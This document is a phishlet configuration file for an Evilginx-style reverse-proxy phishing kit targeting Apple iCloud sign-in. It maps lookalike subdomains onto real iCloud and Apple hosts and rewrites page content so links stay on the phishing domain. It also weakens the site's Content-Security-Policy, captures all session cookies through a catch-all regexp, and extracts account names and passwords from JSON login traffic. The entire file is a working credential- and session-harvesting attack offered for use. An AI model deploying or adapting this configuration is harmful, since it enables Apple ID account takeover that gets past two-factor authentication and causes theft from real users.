author: '@hash3liZer'
min_ver: '3.0.0'

proxy_hosts:
 - {phish_sub: 'www', orig_sub: 'www', domain: 'icloud.com', session: true, is_landing: true, auto_filter: false}
 - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'apple-cloudkit.com', session: false, is_landing: false, auto_filter: false}
 - {phish_sub: 'setup', orig_sub: 'setup', domain: 'icloud.com', session: true, is_landing: false, auto_filter: false}
 - {phish_sub: 'feedbackws', orig_sub: 'feedbackws', domain: 'icloud.com', session: false, is_landing: false, auto_filter: false}
 - {phish_sub: 'appleid', orig_sub: 'appleid', domain: 'cdn-apple.com', session: false, is_landing: false, auto_filter: false}
 - {phish_sub: 'idmsa', orig_sub: 'idmsa', domain: 'icloud.com', session: true, is_landing: false, auto_filter: false}

sub_filters:
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'cdn.apple-cloudkit.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'www.icloud.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'cdn.apple-cloudkit.com', replace: 'cdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'setup.icloud.com', replace: 'setup.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'feedbackws.icloud.com', replace: 'feedbackws.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'appleid.cdn-apple.com', replace: 'appleid.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
 - {triggers_on: 'idmsa.icloud.com', orig_sub: 'idmsa', domain: 'icloud.com', search: 'idmsa.icloud.com', replace: 'idmsa.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}

 - { triggers_on: "icloud.developer.apple.com", orig_sub: "", domain: "", search: '<meta http-equiv="Content-Security-Policy" content="(.*?)"', replace: '<meta http-equiv="Content-Security-Policy" content="default-src *  #data: blob: filesystem: about: ws: wss: ''unsafe-inline'' ''unsafe-eval''; script-src * data: blob: ''unsafe-inline'' ''unsafe-eval''; connect-src * data: blob: ''unsafe-inline''; img-src * data: blob: ''unsafe-inline''; #frame-src * data: blob: ; style-src * data: blob: ''unsafe-inline''; font-src * data: blob: ''unsafe-inline'';"', mimes: ["text/html"], }
 #- { triggers_on: "www.icloud.com", orig_sub: "", domain: "", search: '<meta http-equiv="Content-Security-Policy" content="(.*?)"', replace: '<meta http-equiv="Content-Security-Policy" content="default-src *  data: blob: #filesystem: about: ws: wss: ''unsafe-inline'' ''unsafe-eval''; script-src * data: blob: ''unsafe-inline'' ''unsafe-eval''; connect-src * data: blob: ''unsafe-inline''; img-src * data: blob: ''unsafe-inline''; frame-src * #data: blob: ; style-src * data: blob: ''unsafe-inline''; font-src * data: blob: ''unsafe-inline'';"',  mimes: ["text/html"], }
  

 #- { triggers_on: "www.icloud.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 #- { triggers_on: "setup.icloud.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 #- { triggers_on: "appleid.apple.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 #- { triggers_on: "idmsa.apple.com", orig_sub: "", domain: "", search: '[A-z]&&\(window\.location\.href=[A-z]\)', replace: '', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 #- { triggers_on: "www.icloud.com", orig_sub: "www", domain: "icloud.com", search: 'https:\/\/setup.icloud.com\/setup\/ws\/1\/validate', replace: 'https://{hostname}/setup/ws/1/validate', mimes: ["text/html","application/javascript", "text/javascript"] } 
 - { triggers_on: "www.icloud.com", orig_sub: "www", domain: "icloud.com", search: '\/system\/{domain}\/', replace: '/system/{orig_domain}/', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 - { triggers_on: "account.icloud.com", orig_sub: "", domain: "", search: '\/appleauth(.*?)\/auth', replace: '/appleauth/auth', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 - { triggers_on: "wwww.icloud.com", orig_sub: "", domain: "", search: '\/appleauth(.*?)\/auth', replace: '/appleauth/auth', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 - { triggers_on: "idmsa.apple.com", orig_sub: "idmsa", domain: "apple.com", search: '\/appleauth(.*?)\/auth', replace: '/appleauth/auth', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }
 - { triggers_on: "idmsa.icloud.com", orig_sub: "idmsa", domain: "icloud.com", search: '\/appleauth(.*?)\/auth', replace: '/appleauth/auth', mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"] }


auth_tokens:
 - domain: '.icloud.com'
   keys: ['.*,regexp']
 - domain: 'www.icloud.com'
   keys: ['.*,regexp']
 - domain: 'setup.icloud.com'
   keys: ['.*,regexp']
 - domain: 'idmsa.icloud.com'
   keys: ['.*,regexp']
 

credentials:
 username:
  key: ''
  search: '"accountName":"([^"]*)'
  type: 'json'
 password:
  key: ''
  search: '"password":"([^"]*)'
  type: 'json'

auth_urls:
 - '/asdasdsa/somerandom/'

login:
 domain: 'www.icloud.com'
 path: '/'